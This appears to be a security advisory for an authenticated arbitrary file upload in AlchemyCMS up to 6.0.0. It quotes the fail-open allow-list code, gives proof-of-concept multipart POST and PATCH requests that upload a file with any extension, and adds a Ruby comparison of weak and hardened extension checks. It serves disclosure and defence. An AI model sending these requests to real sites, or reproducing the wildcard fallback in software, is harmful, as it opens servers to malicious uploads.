Alchemy CMS 6.0.0 Arbitrary File Upload

2021.10.13
Credit: Abdulrahman
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

# Exploit Title: AlchemyCMS 2.x to 6.0.0 - Unrestricted File Upload (authenticated)
# Date: 01/10/2021
# Exploit Author: Abdulrahman https://twitter.com/infosec_90
# Vendor Homepage: https://alchemy-cms.com
# Software Link: https://github.com/AlchemyCMS/alchemy_cms
# Version: from 2.0 to 6.0.0
# Tested on: Linux, ruby 2.6.8p205, rails 6

Vulnerable code:

In /app/models/alchemy/attachment.rb, line 82, the list of extensions allowed for attachments is read from the uploader configuration and defaults to an empty list when nothing is configured:

    def allowed_filetypes
      Config.get(:uploader).fetch("allowed_filetypes", {}).fetch("alchemy/attachments", [])
    end

In /app/views/alchemy/admin/uploader/_button.html.erb, line 18, the same missing configuration falls back to a wildcard, so the admin uploader accepts a file with any name and extension:

    configuration(:uploader)['allowed_filetypes'][object.class.model_name.collection] || ['*'] %>

PoC (an authenticated admin session is required; the requests below show only the request line and multipart body, so a real request also needs the Host header, the admin session cookie, a Content-Type: multipart/form-data header carrying the boundary shown and, as this is a Rails application, the CSRF authenticity token):

Upload a new attachment with an arbitrary extension:

    POST /admin/attachments HTTP/1.1

    ------WebKitFormBoundarydAup7dA7ub3Weccp
    Content-Disposition: form-data; name="attachment[file]"; filename="anyfile.anyext"
    Content-Type: application/octet-stream

    anything
    ------WebKitFormBoundarydAup7dA7ub3Weccp--

Or replace the file of an existing attachment (here id = 8):

    PATCH /admin/attachments/8 HTTP/1.1

    ------WebKitFormBoundarylYnqNR9sxMPdw7Si
    Content-Disposition: form-data; name="_method"

    patch
    ------WebKitFormBoundarylYnqNR9sxMPdw7Si
    Content-Disposition: form-data; name="attachment[file]"; filename="anyfile.anyext"
    Content-Type: application/octet-stream

    anything
    ------WebKitFormBoundarylYnqNR9sxMPdw7Si--
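The root cause quoted above is an extension allow-list that fails open: when the list is not configured, the uploader substitutes `['*']` and accepts everything. The Ruby below is an added illustration written for this page, not Alchemy CMS code; the configuration shape, the function names (`weak_allowed?`, `hardened_allowed?`) and the sample file names are assumptions. It places a check that mirrors the `|| ['*']` fallback next to one that fails closed on an empty list, and exercises both on the kind of file name the PoC uses, plus a few edge cases (mixed-case extension, double extension, no extension, an explicit wildcard).

```ruby
require "yaml"

# Constructed sample uploader configurations. The shape is modelled on the
# Config.get(:uploader) hash quoted in the advisory; the keys and the
# extension lists are assumptions for this example.
CONFIG_WITH_LIST = YAML.safe_load(<<~YAML)
  allowed_filetypes:
    alchemy/attachments: [pdf, txt, jpg]
YAML

CONFIG_EMPTY = YAML.safe_load(<<~YAML)
  allowed_filetypes: {}
YAML

CONFIG_WILDCARD = YAML.safe_load(<<~YAML)
  allowed_filetypes:
    alchemy/attachments: ["*"]
YAML

# Mirrors the model method quoted above: an empty list when nothing is set.
def configured_filetypes(config)
  config.fetch("allowed_filetypes", {}).fetch("alchemy/attachments", [])
end

# The extension as the server will interpret it: the last dot-suffix, lower-cased.
# "shell.pdf.php" therefore yields "php", not "pdf".
def extension_of(filename)
  File.extname(filename).delete_prefix(".").downcase
end

# Weak check: reproduces the view's `|| ['*']` fallback. An unconfigured
# list becomes a wildcard, so any extension passes.
def weak_allowed?(config, filename)
  list = configured_filetypes(config).map { |e| e.to_s.downcase }
  list = ["*"] if list.empty?
  list.include?("*") || list.include?(extension_of(filename))
end

# Hardened check: fails closed when the list is missing or empty, requires a
# non-empty extension, and only honours "*" when an administrator wrote it
# literally into the configuration.
def hardened_allowed?(config, filename)
  list = configured_filetypes(config).map { |e| e.to_s.downcase }
  return false if list.empty?

  ext = extension_of(filename)
  return false if ext.empty? || filename.end_with?(".")
  return true if list.include?("*")

  list.include?(ext)
end

if $PROGRAM_NAME == __FILE__
  ["anyfile.anyext", "report.PDF", "shell.php", "shell.pdf.php", "noext"].each do |name|
    puts format("%-16s weak(empty cfg)=%-5s hardened(empty cfg)=%-5s hardened(list)=%s",
                name, weak_allowed?(CONFIG_EMPTY, name),
                hardened_allowed?(CONFIG_EMPTY, name),
                hardened_allowed?(CONFIG_WITH_LIST, name))
  end
end
```

The check must run in the model, not only in the view that builds the upload button: the PoC requests bypass the browser-side filter entirely, so whatever the template decides is irrelevant to a hand-crafted multipart body.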

